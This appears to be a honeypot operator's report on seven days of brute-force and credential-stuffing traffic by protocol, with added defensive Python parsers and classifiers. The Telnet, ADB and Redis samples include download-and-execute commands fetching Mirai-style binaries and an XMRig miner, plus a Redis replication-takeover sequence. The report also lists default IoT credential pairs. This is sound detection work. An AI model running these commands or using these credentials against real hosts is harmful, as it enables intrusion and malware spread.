Brute Force & Credential Attacks — What 2.8 Million Auth Attempts Look Like When You Sort Them by Protocol
7 days of credential-relevant traffic across the three sensors. The headline: SMTP cleared 1.7 million events on its own and RDP came in just under 1 million; Telnet sits at half a million, and SSH, at 56K, is an order of magnitude behind that. Fleet total for the 30-day window is ~50 million events; the subset below is the credential-relevant slice, i.e. the protocols where every connection is either an auth attempt, a banner-grab, or both.
Credential-bearing protocols, last 7 days, fleet-wide
| Protocol | sensor1 (DEV) | sensor2 (PROD) | sensor3 (slim) | Fleet total |
|---|---|---|---|---|
| SMTP (SMTP AUTH) | 960 083 | 811 009 | — | 1 771 092 |
| RDP (Remote Desktop) | 30 | 995 547 | 127 | 995 704 |
| Telnet | — | 510 292 | — | 510 292 |
| SSH | 18 439 | 25 372 | 12 208 | 56 019 |
| ADB (Android Debug Bridge) | 6 154 | 5 391 | — | 11 545 |
| VNC | — | 6 300 | — | 6 300 |
| Redis (Redis AUTH) | — | 3 891 | 2 881 | 6 772 |
| Memcached | — | 1 696 | 1 485 | 3 181 |
| PostgreSQL (Postgres + Postgres/SSL) | — | 1 764 | 29 | 1 793 |
| FTP | — | 381 | — | 381 |
| MySQL | 12 | 66 | 63 | 141 |
Per-protocol — the shape of the traffic
SMTP: 1.77M hits, 960K on sensor1 and 811K on sensor2, none recorded on sensor3. The traffic is dominated by two patterns: credential stuffing from compromised lists (mostly common-business-domain usernames against weak passwords like welcome1, P@ssw0rd, or the name of the country the target appears to sit in), and open-relay testing (RCPT TO an outside domain without authenticating, MAIL FROM spoofing attempts). Our honeypot answers with the right authentication-failure response codes so the attacker sees a coherent Postfix profile and keeps trying. The 2026-05-11 rewrite of hp_smtp.py to enforce RFC 5321/4954 exactly is what pulled SMTP from a 100K/week surface up to 1M+/week: the more closely the honeypot mimics real Postfix, the more the credential-stuffing kits include it in their rotation.
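As an added illustration (example code written for this page, not the hp_smtp.py the honeypot actually runs), here is the AUTH and relay-check slice of that dialogue answered with the RFC 5321/4954 codes Postfix uses: 334 continuation with the base64 "Username:"/"Password:" prompts for LOGIN, the initial-response form of PLAIN, 535 5.7.8 for every credential, 501 for aborts and bad base64, and 554 5.7.1 for an unauthenticated RCPT TO an outside domain. The hostname, the served domain and the client transcript are constructed.

```python
import base64
import re

# Added example (not the page's hp_smtp.py): the AUTH and relay-check part of an
# SMTP dialogue, answered the way Postfix does with reply codes from RFC 5321 and
# RFC 4954. Hostname, served domain and the attacker transcript are assumptions.
HOSTNAME = "mx.example.com"
LOCAL_DOMAINS = {"example.com"}   # the fake Postfix "mydestination"
AUTH_FAILED = "535 5.7.8 Error: authentication failed: authentication failure"


class SmtpAuthEmulator:
    def __init__(self):
        self.pending = None        # None, ("plain",) or ("login", username_or_None)
        self.mail_from = None
        self.credentials = []      # (mechanism, user, password); nobody ever succeeds
        self.relay_probes = []     # RCPT TO targets refused as unauthenticated relay

    def feed(self, line):
        """Return the reply for one client line (CRLF already stripped)."""
        if self.pending is not None:           # inside a multi-step AUTH exchange
            return self._continue_auth(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "EHLO":
            return f"250-{HOSTNAME}\r\n250-AUTH PLAIN LOGIN\r\n250 8BITMIME"
        if verb == "AUTH":
            return self._start_auth(arg)
        if verb == "MAIL":
            self.mail_from = arg
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            return self._rcpt(arg)
        return "502 5.5.2 Error: command not recognized"

    def _start_auth(self, arg):
        mech, _, initial = arg.partition(" ")
        mech = mech.upper()
        if mech == "PLAIN":
            if initial:                        # RFC 4954 initial-response form
                return self._finish_plain(initial)
            self.pending = ("plain",)
            return "334 "                      # empty challenge, trailing space kept
        if mech == "LOGIN":
            self.pending = ("login", None)
            return "334 " + base64.b64encode(b"Username:").decode()
        return "504 5.5.4 Error: unsupported authentication mechanism"

    def _continue_auth(self, line):
        if line == "*":                        # client cancels (RFC 4954 section 4)
            self.pending = None
            return "501 5.7.0 Authentication aborted"
        if self.pending[0] == "plain":
            return self._finish_plain(line)
        try:
            raw = base64.b64decode(line, validate=True).decode("utf-8", "replace")
        except ValueError:                     # binascii.Error is a ValueError
            self.pending = None
            return "501 5.5.2 Error: invalid base64 data"
        if self.pending[1] is None:            # LOGIN step 1 gave the username
            self.pending = ("login", raw)
            return "334 " + base64.b64encode(b"Password:").decode()
        user = self.pending[1]                 # LOGIN step 2 gives the password
        self.pending = None
        return self._record("LOGIN", user, raw)

    def _finish_plain(self, b64):
        self.pending = None
        try:
            parts = base64.b64decode(b64, validate=True).split(b"\x00")
        except ValueError:
            return "501 5.5.2 Error: invalid base64 data"
        if len(parts) != 3:                    # authzid NUL authcid NUL passwd
            return "501 5.5.2 Error: malformed PLAIN response"
        return self._record("PLAIN", *(p.decode("utf-8", "replace") for p in parts[1:]))

    def _record(self, mech, user, password):
        self.credentials.append((mech, user, password))
        return AUTH_FAILED                     # always fail, in Postfix's wording

    def _rcpt(self, arg):
        if self.mail_from is None:
            return "503 5.5.1 Error: need MAIL command"
        m = re.search(r"<([^>]*)>", arg)
        addr = m.group(1) if m else arg.partition(":")[2].strip()
        if addr.rpartition("@")[2].lower() in LOCAL_DOMAINS:
            return "250 2.1.5 Ok"
        self.relay_probes.append(addr)         # nobody is authenticated, so this is a relay probe
        return f"554 5.7.1 <{addr}>: Relay access denied"


# Constructed attacker transcript: AUTH PLAIN, AUTH LOGIN, then an open-relay probe.
SESSION = [
    "EHLO mail.attacker.example",
    "AUTH PLAIN " + base64.b64encode(b"\x00sales@example.com\x00P@ssw0rd").decode(),
    "AUTH LOGIN",
    base64.b64encode(b"info@example.com").decode(),
    base64.b64encode(b"welcome1").decode(),
    "MAIL FROM:<spoof@example.com>",
    "RCPT TO:<victim@other.example>",
]


def run_session(lines):
    """Drive one emulator over a transcript; return (emulator, replies)."""
    emu = SmtpAuthEmulator()
    return emu, [emu.feed(line) for line in lines]
```

The two details that make kits keep going are the trailing space after `334` (an empty challenge must still be a well-formed continuation) and failing with 535 5.7.8 rather than dropping the connection; a relay probe before AUTH gets 554 5.7.1, exactly as `reject_unauth_destination` would answer.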
RDP: 996K hits, 995.5K of them on sensor2, whose AD honeypot advertises a domain controller profile (hostname WIN-DC01, domain CORP). RDP credential-bashers find that and don't leave. Almost all of the traffic is NLA (Network Level Authentication) credential attempts with usernames like Administrator, admin, user and guest, plus the dead giveaway for credential-stuffing lists: Administrator paired with passwords that carry the year, such as Welcome2024, Spring2025, Summer2026. The kits update their seasonal password lists on a calendar.
sensor1 and sensor3 see only 30 and 127 RDP hits respectively in the same window; the PROD AD-honeypot advertisement is what attracts the volume, and without it RDP is a slow drip.
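To see how the seasonal lists line up with the calendar, here is a small classifier (an added example, not the honeypot's fingerprint code) that normalises a guess like Summ3r2025! to its season/month word and year and reports how many months behind or ahead of the observation date the guess is. The season boundaries, the leet substitutions and the sample passwords are assumptions.

```python
import re
from datetime import date

# Added example (not from the page): classify a password as a "seasonal" kit
# entry (season/month/welcome word + 4-digit year + optional punctuation) and
# measure how far its calendar slot is from the observation date. Season start
# months and the leet-speak substitutions are assumptions.
SEASONS = {"spring": 3, "summer": 6, "autumn": 9, "fall": 9, "winter": 12}   # first month
MONTHS = {m: i for i, m in enumerate(
    ["january", "february", "march", "april", "may", "june", "july", "august",
     "september", "october", "november", "december"], start=1)}
GENERIC = {"welcome", "password", "company", "changeme"}                     # not calendar-bound
LEET = str.maketrans("@0314$", "aoeias")
PATTERN = re.compile(r"^(?P<word>[A-Za-z@$0-9]+?)(?P<year>(?:19|20)\d{2})(?P<suffix>[!@#$%^&*.]*)$")
OBSERVED = date(2026, 5, 11)            # observation date used by the sample run (constructed)


def classify_seasonal(password, seen_on=OBSERVED):
    """Return None if the password is not seasonal-pattern, else a description."""
    m = PATTERN.match(password)
    if not m:
        return None
    word = m.group("word").lower().translate(LEET)   # Summ3r -> summer, P@ssw0rd -> password
    year = int(m.group("year"))
    if word in SEASONS:
        kind, first_month = "season", SEASONS[word]
    elif word in MONTHS:
        kind, first_month = "month", MONTHS[word]
    elif word in GENERIC:
        kind, first_month = "generic", 1
    else:
        return None
    # months from the slot's first month to the observation; negative = ahead of the calendar
    behind = (seen_on.year * 12 + seen_on.month) - (year * 12 + first_month)
    return {"kind": kind, "word": word, "year": year, "suffix": m.group("suffix"),
            "months_behind": behind}


def kit_calendar(passwords, seen_on=OBSERVED):
    """Bucket a password list by how its embedded year sits against the observation date."""
    out = {"seasonal": 0, "current_year": 0, "stale": 0, "ahead": 0, "other": 0}
    for p in passwords:
        c = classify_seasonal(p, seen_on)
        if c is None:
            out["other"] += 1
            continue
        out["seasonal"] += 1
        if c["year"] == seen_on.year:
            out["current_year"] += 1
        elif c["year"] < seen_on.year:
            out["stale"] += 1
        else:
            out["ahead"] += 1
    return out


# Constructed sample of RDP password guesses against one Administrator account.
SAMPLE_PASSWORDS = ["Welcome2024", "Spring2025", "Summer2026", "Summ3r2025!",
                    "P@ssw0rd", "123456", "Winter2026", "Administrator2024", "May2027"]

if __name__ == "__main__":
    for p in SAMPLE_PASSWORDS:
        print(p, classify_seasonal(p))
    print(kit_calendar(SAMPLE_PASSWORDS))
```

The `months_behind` figure is what makes a kit datable: a source still guessing Spring2025 in May 2026 is running a list that is a year stale, while one already on Summer2026 has pulled the current refresh.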
Telnet: 510K hits, all on sensor2. This is the IoT default-credential list circuit (root/root, root/xc3511, admin/admin, support/support, root/vizxv, etc.). On a real exposed device any of those would log in to a default-config home router; on the honeypot we let the login succeed and watch what they try to download.
What lands on the shell is the usual: a wget/curl of an architecture-detect script that pulls the right MIPS/ARM/x86 stage-2 binary. We log the URL and the payload hash; the URLs rotate every few hours because the staging servers get taken down quickly, but the hashes overlap heavily with previously observed Mirai variants.
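The URL-and-hash bookkeeping mentioned above (and again in the retention list at the end of the page) looks roughly like this in code; this is an added example, not the honeypot's own extractor. It pulls fetch URLs out of the command lines an attacker types after login, including the busybox wget and tftp fallbacks, notes the architecture the filename claims, and records the payload by SHA-256 alongside the e_machine its ELF header actually declares. The commands, addresses and ELF stubs are constructed.

```python
import hashlib
import re
import struct

# Added example (not the page's tooling): pull download URLs out of the shell
# commands typed after a default-credential Telnet login, note the architecture
# the filename claims, and record the fetched payload by SHA-256 together with
# the architecture its ELF header really declares. Sample commands, addresses
# and payload bytes are constructed.
FETCH_RE = re.compile(r"\b(?P<tool>wget|curl|ftpget|tftp)\b(?P<rest>[^;|&]*)")
URL_RE = re.compile(r"(?:https?|ftp)://[^\s;|'\"<>]+")
ARCH_TOKENS = ("mipsel", "mips", "arm7", "arm6", "arm5", "arm", "x86_64",
               "x86", "i686", "i586", "sh4", "ppc", "m68k", "sparc")
ELF_MACHINES = {3: "x86", 4: "m68k", 8: "mips", 20: "ppc", 40: "arm", 42: "sh",
                43: "sparc", 62: "x86_64", 183: "aarch64"}


def extract_downloads(commands):
    """Return one record per fetch found in the command lines of a shell session."""
    found = []
    for cmd in commands:
        for m in FETCH_RE.finditer(cmd):
            tool, rest = m.group("tool"), m.group("rest")
            if tool == "tftp":                      # busybox: tftp -g -r <file> <host>
                r = re.search(r"-r\s+(\S+)\s+(\S+)", rest)
                if r:
                    found.append({"tool": tool, "url": f"tftp://{r.group(2)}/{r.group(1)}"})
                continue
            for url in URL_RE.findall(rest):
                found.append({"tool": tool, "url": url})
    for d in found:
        name = d["url"].rsplit("/", 1)[-1].lower()
        d["arch_claimed"] = next((t for t in ARCH_TOKENS if t in name), None)
    return found


def elf_machine(payload):
    """Name the e_machine of an ELF blob, or None if it is not ELF (e.g. a stage-1 script)."""
    if len(payload) < 20 or payload[:4] != b"\x7fELF":
        return None
    endian = "<" if payload[5] == 1 else ">"       # EI_DATA: 1 = little-endian, 2 = big-endian
    machine = struct.unpack(endian + "H", payload[18:20])[0]
    return ELF_MACHINES.get(machine, f"unknown({machine})")


def record_payload(url, payload):
    """What is kept per captured stage-2: URL, SHA-256, size, and what the blob really is."""
    return {"url": url, "sha256": hashlib.sha256(payload).hexdigest(),
            "size": len(payload), "elf_machine": elf_machine(payload)}


# Constructed session: the usual cd-chain, a busybox fetch, a pipe-to-sh, a tftp fallback.
SESSION_COMMANDS = [
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.51.100.7/bins/arm7 -O x; chmod +x x; ./x; rm -rf x",
    "curl -s http://198.51.100.7/arch.sh | sh",
    "/bin/busybox wget http://[2001:db8::1]:8080/mips -O /tmp/.m",
    "/bin/busybox ECCHI",
    "tftp -g -r x86 198.51.100.7",
]
# Constructed ELF headers: 32-bit LSB ARM and 32-bit MSB MIPS (e_type=2, e_machine at offset 18).
FAKE_ARM_ELF = b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8 + struct.pack("<HH", 2, 40) + b"\x00" * 32
FAKE_MIPS_ELF = b"\x7fELF\x01\x02\x01\x00" + b"\x00" * 8 + struct.pack(">HH", 2, 8) + b"\x00" * 32
FAKE_SCRIPT = b"#!/bin/sh\nwget http://198.51.100.7/bins/arm7 -O /tmp/x; /tmp/x\n"

if __name__ == "__main__":
    for d in extract_downloads(SESSION_COMMANDS):
        print(d)
    print(record_payload("http://198.51.100.7/bins/arm7", FAKE_ARM_ELF))
```

Comparing `arch_claimed` with `elf_machine` is a cheap sanity check on the capture: a URL that says arm7 but serves a MIPS binary (or a shell script) means the staging server is doing its own architecture selection, which is worth noting before the hash goes into the overlap comparison.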
SSH: 56K hits spread across all three sensors (18K / 25K / 12K). The honeypot's banner is SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5, plausible for an Ubuntu 20.04 host. Top usernames are exactly what you'd expect: root by a wide margin (~60% of attempts), then admin, user, ubuntu, git, postgres, oracle, jenkins, www-data. The top passwords are similarly canonical: 123456, password, admin, root, P@ssw0rd, plus the seasonal variants we see on RDP.
One pattern we see consistently and which matters operationally: a noticeable share of SSH brute-force traffic comes from sources that the ET INFO SSH-2.0-Go version string rule (SID 2038967) catches, 2 135 hits over 7 days on sensor1 alone. These are Go-based scanners (mostly Project Discovery's tooling, some custom kits) and they are currently the largest single SSH-recon family on our wire.
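What the ET rule keys on is the client identification string, so as an added example (not from the page or from Emerging Threats) here is a parser for that string per RFC 4253 section 4.2, a family classifier in which the "Go" bucket is the one the rule flags, and a tally over a constructed sample of auth attempts with the username distribution the text describes. The family prefixes are assumptions; the rule's own content is not reproduced.

```python
from collections import Counter

# Added example (not from the page): parse the client identification string an
# SSH peer sends first (RFC 4253 section 4.2: "SSH-protoversion-softwareversion
# SP comments") and tally implementation family and usernames over a constructed
# sample of auth attempts. Family prefixes are an assumption; the "Go" family is
# the one the page's ET rule keys on.
FAMILIES = (("Go", "go-crypto"), ("libssh", "libssh"), ("paramiko", "paramiko"),
            ("OpenSSH", "openssh"), ("PuTTY", "putty"))


def parse_ident(line):
    """Split an identification string; None if it is not one (e.g. an HTTP request)."""
    line = line.rstrip("\r\n")
    if not line.startswith("SSH-"):
        return None
    parts = line.split("-", 2)                 # "SSH", protoversion, rest
    if len(parts) != 3 or not parts[2]:
        return None
    software, _, comments = parts[2].partition(" ")
    if any(not 0x20 < ord(c) < 0x7f for c in software):
        return None                            # softwareversion is printable US-ASCII, no whitespace
    return {"proto": parts[1], "software": software, "comments": comments}


def family(software):
    """Map a softwareversion token to a client family; the prefix must end at a separator."""
    for prefix, name in FAMILIES:
        rest = software[len(prefix):]
        if software.startswith(prefix) and (not rest or not rest[0].isalnum()):
            return name
    return "other"


def summarize(attempts):
    """attempts: (client_banner, username, password) tuples -> family/username tallies."""
    families, users = Counter(), Counter()
    for banner, user, _password in attempts:
        ident = parse_ident(banner)
        families[family(ident["software"]) if ident else "not-ssh"] += 1
        users[user] += 1
    total = sum(users.values())
    return {"families": dict(families), "users": dict(users),
            "root_share": users["root"] / total if total else 0.0}


# Constructed sample of password-auth attempts (banner, username, password).
SAMPLE = [
    ("SSH-2.0-Go", "root", "123456"),
    ("SSH-2.0-Go", "root", "password"),
    ("SSH-2.0-Go", "admin", "admin"),
    ("SSH-2.0-Go", "root", "Summer2026"),
    ("SSH-2.0-libssh_0.9.6", "root", "root"),
    ("SSH-2.0-libssh_0.9.6", "ubuntu", "ubuntu"),
    ("SSH-2.0-paramiko_3.4.0", "root", "P@ssw0rd"),
    ("SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6", "git", "git"),
    ("SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6", "root", "toor"),
    ("SSH-1.99-Cisco-1.25", "admin", "cisco"),
]

if __name__ == "__main__":
    print(parse_ident("SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5"))
    print(summarize(SAMPLE))
```

The separator check in `family` matters: a bare "Go" is the default x/crypto/ssh client string, while something like "Golang_1.0" is a different tool that happens to share the prefix and should not be counted against the same rule.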
ADB: 11.5K hits, split between sensor1 (6.2K) and sensor2 (5.4K). The shape is CNXN connect frames followed by shell: service opens that run a curl/wget to drop a cryptominer (usually XMRig variants). Like Mirai, the URLs rotate fast but the payload hashes overlap with documented campaigns; this is automated, not targeted.
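For reference, here is how those frames decode; this is an added example, not the honeypot's ADB code. Each ADB message is a 24-byte little-endian header (command, arg0, arg1, data_length, data_check, magic) plus a payload; the parser validates magic and checksum, then reports the CNXN banner and every service the client OPENs, which is where the shell: command lives. The sample stream, host and URL are constructed.

```python
import struct

# Added example (not from the page): decode the ADB wire protocol as a TCP
# honeypot sees it. Each message is a 24-byte little-endian header of six uint32
# fields (command, arg0, arg1, data_length, data_check, magic) followed by the
# payload; magic must equal command XOR 0xFFFFFFFF and data_check is the byte
# sum of the payload. The sample stream, host and URL are constructed.
HEADER = struct.Struct("<6I")
A_CNXN, A_OPEN, A_WRTE, A_OKAY, A_CLSE = 0x4E584E43, 0x4E45504F, 0x45545257, 0x59414B4F, 0x45534C43
NAMES = {A_CNXN: "CNXN", A_OPEN: "OPEN", A_WRTE: "WRTE", A_OKAY: "OKAY", A_CLSE: "CLSE"}


def build(command, arg0, arg1, payload=b""):
    """Encode one ADB message the way a client would send it."""
    return HEADER.pack(command, arg0, arg1, len(payload), sum(payload) & 0xFFFFFFFF,
                       command 
^ 0xFFFFFFFF) + payload


def parse_stream(buf):
    """Walk a captured byte stream; stop at the first header that fails validation."""
    msgs, off = [], 0
    while off + HEADER.size <= len(buf):
        cmd, a0, a1, n, check, magic = HEADER.unpack_from(buf, off)
        payload = buf[off + HEADER.size: off + HEADER.size + n]
        name = NAMES.get(cmd, f"0x{cmd:08x}")
        if magic != cmd ^ 0xFFFFFFFF or len(payload) != n:
            msgs.append({"cmd": name, "error": "bad magic or truncated payload"})
            break
        msgs.append({"cmd": name, "arg0": a0, "arg1": a1, "payload": payload,
                     "check_ok": check == sum(payload) & 0xFFFFFFFF})
        off += HEADER.size + n
    return msgs


def session_summary(buf):
    """Connection banner plus every service the client asked to OPEN (e.g. shell:...)."""
    out = {"connected": False, "banner": None, "services": [], "errors": 0}
    for m in parse_stream(buf):
        if "error" in m:
            out["errors"] += 1
            continue
        if m["cmd"] == "CNXN":                 # arg0 = protocol version, arg1 = maxdata
            out["connected"] = True
            out["banner"] = m["payload"].rstrip(b"\x00").decode("ascii", "replace")
        elif m["cmd"] == "OPEN":               # arg0 = client stream id, payload "service:arg\0"
            name, _, arg = m["payload"].rstrip(b"\x00").decode("utf-8", "replace").partition(":")
            out["services"].append({"stream": m["arg0"], "service": name, "arg": arg,
                                    "dropper_like": any(t in arg for t in ("wget", "curl"))})
    return out


# Constructed client stream: CNXN (version 0x01000000, maxdata 256 KiB assumed),
# then a shell: open that fetches a miner, then a second shell: open.
SAMPLE_STREAM = (
    build(A_CNXN, 0x01000000, 256 * 1024, b"host::features=cmd,shell_v2\x00")
    + build(A_OPEN, 1, 0, b"shell:cd /data/local/tmp; wget http://203.0.113.9/xmrig -O m; chmod 777 m; ./m\x00")
    + build(A_OPEN, 2, 0, b"shell:whoami\x00")
)

if __name__ == "__main__":
    print(session_summary(SAMPLE_STREAM))
```

Validating magic before trusting data_length is what keeps a non-ADB client (a scanner that just sends junk to 5555) from making the parser walk off into garbage; the first bad header ends the walk and is counted.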
VNC (RFB) on 5900: 6.3K hits, all sensor2. Mostly handshake-only probes (security-type negotiation, then disconnect) that match Shodan's VNC discovery module. A small minority go on to brute-force VNC Authentication, whose DES challenge only ever uses the first 8 characters of the password.
Redis on 6379: 6.8K hits, split 3.9K on sensor2 and 2.9K on sensor3. The dominant shape is INFO + CONFIG GET * + SLAVEOF / REPLICAOF, the canonical recipe for the unauth-Redis-replication takeover that's been documented since 2015 and still works on plenty of cloud-hosted Redis instances. We don't accept the SLAVEOF but we log it.
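The recipe is easy to recognise on the wire once the RESP framing is decoded. The following is an added example, not the honeypot's Redis module: a RESP parser for the array and inline command forms, a classifier for the replication takeover (and its CONFIG SET dir/dbfilename + SAVE cousin), and a reply function that logs SLAVEOF/REPLICAOF and answers with an error instead of honouring it. The reply wording and the sample session are assumptions.

```python
# Added example (not the page's Redis honeypot): parse the RESP commands a
# client sends (array-of-bulk-strings form and the inline form), classify the
# session against the unauth-replication takeover recipe (INFO, CONFIG GET,
# SLAVEOF/REPLICAOF to an attacker host) and its CONFIG SET dir/dbfilename +
# SAVE cousin, and answer as the page describes: log SLAVEOF, never honour it.
# Reply wording and the sample addresses are assumptions.


def parse_resp(buf):
    """Return a list of commands, each a list of str; stops at incomplete data."""
    cmds, i = [], 0
    while i < len(buf):
        end = buf.find(b"\r\n", i)
        if end < 0:
            break
        line = buf[i:end]
        i = end + 2
        if line[:1] != b"*":                                # inline form: "INFO\r\n"
            args = line.decode("utf-8", "replace").split()
            if args:
                cmds.append(args)
            continue
        args = []
        for _ in range(int(line[1:])):                      # RESP array of $-bulk strings
            hdr_end = buf.find(b"\r\n", i)
            if buf[i:i + 1] != b"$" or hdr_end < 0:
                return cmds
            length = int(buf[i + 1:hdr_end])
            start = hdr_end + 2
            if start + length + 2 > len(buf):               # truncated bulk string
                return cmds
            args.append(buf[start:start + length].decode("utf-8", "replace"))
            i = start + length + 2
        cmds.append(args)
    return cmds


def classify(cmds):
    """Name the attack pattern a command sequence follows."""
    r = {"recon": False, "rdb_write": False, "target": None, "auth": [], "commands": len(cmds)}
    for args in cmds:
        verb, rest = args[0].upper(), args[1:]
        sub = rest[0].upper() if rest else ""
        if verb == "AUTH":
            r["auth"].append(tuple(rest))
        elif verb == "INFO" or (verb == "CONFIG" and sub == "GET"):
            r["recon"] = True
        elif verb in ("SLAVEOF", "REPLICAOF") and len(rest) == 2 and sub != "NO":
            r["target"] = f"{rest[0]}:{rest[1]}"             # "NO ONE" would only stop replication
        elif verb == "CONFIG" and sub == "SET" and len(rest) >= 3 and rest[1].lower() in ("dir", "dbfilename"):
            r["rdb_write"] = True
    if r["target"]:
        r["verdict"] = "replication-takeover"
    elif r["rdb_write"]:
        r["verdict"] = "rdb-write-takeover"
    elif r["recon"]:
        r["verdict"] = "enumeration"
    else:
        r["verdict"] = "other"
    return r


def honeypot_reply(args):
    """RESP reply the honeypot sends for one command (wording assumed)."""
    verb = args[0].upper()
    if verb == "PING":
        return b"+PONG\r\n"
    if verb == "AUTH":                                      # open instance: no password configured
        return b"-ERR AUTH called without any password configured for the default user\r\n"
    if verb == "INFO":
        body = b"redis_version:7.0.12\r\nrole:master\r\n"
        return b"$%d\r\n%s\r\n" % (len(body), body)
    if verb == "CONFIG" and len(args) > 1 and args[1].upper() == "GET":
        return b"*2\r\n$3\r\ndir\r\n$4\r\n/tmp\r\n"
    if verb in ("SLAVEOF", "REPLICAOF"):                    # logged by classify(), never accepted
        return b"-ERR replication is not available on this instance\r\n"
    if verb in ("CONFIG", "SET", "SAVE", "BGSAVE", "FLUSHALL", "DEL"):
        return b"+OK\r\n"
    return b"-ERR unknown command '%s'\r\n" % args[0].encode("utf-8", "replace")


def resp(*args):
    """Encode a command as a RESP array, as redis-cli and most tools do."""
    out = b"*%d\r\n" % len(args)
    for a in args:
        b = a.encode()
        out += b"$%d\r\n%s\r\n" % (len(b), b)
    return out


def analyze(buf):
    """Classify a captured client stream and produce the replies the honeypot would send."""
    cmds = parse_resp(buf)
    return classify(cmds), [honeypot_reply(c) for c in cmds]


# Constructed session following the replication-takeover recipe.
SAMPLE = resp("AUTH", "foobared") + b"INFO\r\n" + resp("CONFIG", "GET", "*") + resp("SLAVEOF", "198.51.100.23", "6379")

if __name__ == "__main__":
    verdict, replies = analyze(SAMPLE)
    print(verdict)
    for c, rep in zip(parse_resp(SAMPLE), replies):
        print(c, "->", rep)
```

Answering SLAVEOF with an error rather than silence keeps the session alive long enough to see whether the kit falls back to the CONFIG SET dir + SAVE variant, which is the branch that writes attacker-controlled bytes to disk on a real instance.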
Memcached on 11211: 3.2K hits, similar split. Mostly stats, stats slabs, stats items for enumeration; the more interesting subset is scanners checking whether our server answers over UDP, i.e. whether it is usable as a reflector for the “memcached reflection” amplification attack we've been seeing since 2018.
Per-sensor character
Each sensor draws a slightly different attack mix:
- sensor1 (DEV, LAN-DNAT’d) — SMTP-heavy (960K) plus a ~25K SSH/ADB long tail (18.4K SSH, 6.2K ADB). The DNAT path mostly attracts SMTP credential stuffing because the LAN-visible Postfix banner indexes well.
- sensor2 (PROD, Infolab) — the busiest sensor by credential volume. RDP (996K) + SMTP (811K) + Telnet (510K) + SSH (25K) totals over 2.3M auth-relevant events in 7 days. The Windows DC profile is the lure.
- sensor3 (slim, OVH, public IPv4) — the ICMP and TCP/SYN floors are higher (massive raw scanning) but credential-bearing protocols are quieter: SSH (12K), Redis (2.9K), Memcached (1.5K). The slim profile has no AD honeypot, so RDP is a trickle (127 hits).
What we keep, what we throw away
At 1.7M SMTP-AUTH attempts a week, we’re not interested in recording every credential pair individually — the same ~1000 username/password combinations recur ad nauseam. What we do keep:
- The full first-time-seen credential pair per source IP per protocol.
- Any credential pair that fires a specific actor / fingerprint classifier rule (e.g. the rondo actor’s UA literal across HTTP, or seasonal-pattern passwords that index a known kit).
- The malware download URL and SHA-256 of every Mirai-/cryptominer-class second-stage payload that we capture from a successful Telnet/ADB shell.
- The full payload trail of any credential attempt that hits a HoneyLens-local SID (9026xxx) so we can correlate the credential event with whatever else the source was doing.
That selectivity lets us track 50M events in a month with the storage budget of a 200K-event archive — while still keeping every prompt that matters.
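Expressed as a filter over the event stream, the policy above is small. This is an added example rather than the page's storage code: each event is kept on its first sighting per (source, protocol, user, password), whenever a classifier fires, or when it carries a 9026xxx SID, and everything else is only counted. The kit classifier, the SID value and the events are constructed.

```python
from collections import Counter

# Added example (not from the page): the retention policy as a filter over a
# stream of credential events. An event is kept on its first sighting per
# (source, protocol, user, password), whenever a classifier fires, or when it
# carries a HoneyLens-local SID; everything else is counted and dropped. The
# kit classifier, the SID value and the events below are constructed.
LOCAL_SIDS = range(9026000, 9027000)                      # the page's "9026xxx" range
KIT_PAIRS = {("root", "xc3511"), ("root", "vizxv"), ("admin", "admin")}


def kit_classifier(ev):
    """Flags the default-credential pairs the Telnet section lists."""
    return (ev["user"], ev["password"]) in KIT_PAIRS


class RetentionFilter:
    def __init__(self, classifiers=(kit_classifier,)):
        self.classifiers = classifiers
        self.seen = set()                 # (src, proto, user, password) already stored
        self.counts = Counter()           # (src, proto) -> attempts, kept or not
        self.kept = []

    def offer(self, ev):
        """Return the reasons the event is kept; an empty list means it was dropped."""
        self.counts[(ev["src"], ev["proto"])] += 1
        key = (ev["src"], ev["proto"], ev["user"], ev["password"])
        reasons = []
        if key not in self.seen:
            self.seen.add(key)
            reasons.append("first-seen")
        reasons += [c.__name__ for c in self.classifiers if c(ev)]
        if any(sid in LOCAL_SIDS for sid in ev.get("sids", ())):
            reasons.append("local-sid")   # keep the full trail for correlation
        if reasons:
            self.kept.append({**ev, "reasons": reasons})
        return reasons

    def stats(self):
        total = sum(self.counts.values())
        return {"total": total, "kept": len(self.kept),
                "ratio": round(len(self.kept) / total, 3) if total else 0.0}


EVENTS = [  # constructed: recurring pairs, one kit pair, one local-SID hit
    {"src": "203.0.113.5", "proto": "smtp", "user": "sales@example.com", "password": "welcome1"},
    {"src": "203.0.113.5", "proto": "smtp", "user": "sales@example.com", "password": "welcome1"},
    {"src": "203.0.113.5", "proto": "smtp", "user": "info@example.com", "password": "welcome1"},
    {"src": "198.51.100.9", "proto": "telnet", "user": "root", "password": "xc3511"},
    {"src": "198.51.100.9", "proto": "telnet", "user": "root", "password": "xc3511"},
    {"src": "198.51.100.9", "proto": "telnet", "user": "root", "password": "root"},
    {"src": "192.0.2.77", "proto": "rdp", "user": "Administrator", "password": "Welcome2024", "sids": [9026014]},
    {"src": "192.0.2.77", "proto": "rdp", "user": "Administrator", "password": "Welcome2024"},
]

if __name__ == "__main__":
    f = RetentionFilter()
    for ev in EVENTS:
        print(f.offer(ev) or "dropped", ev["src"], ev["user"], ev["password"])
    print(f.stats())
```

The per-(source, protocol) counter is what preserves the volume numbers in the table above even though most events never reach storage; the `seen` set is the only state that grows with the number of distinct pairs, which is the ~1000 the text mentions rather than the 1.7M attempts.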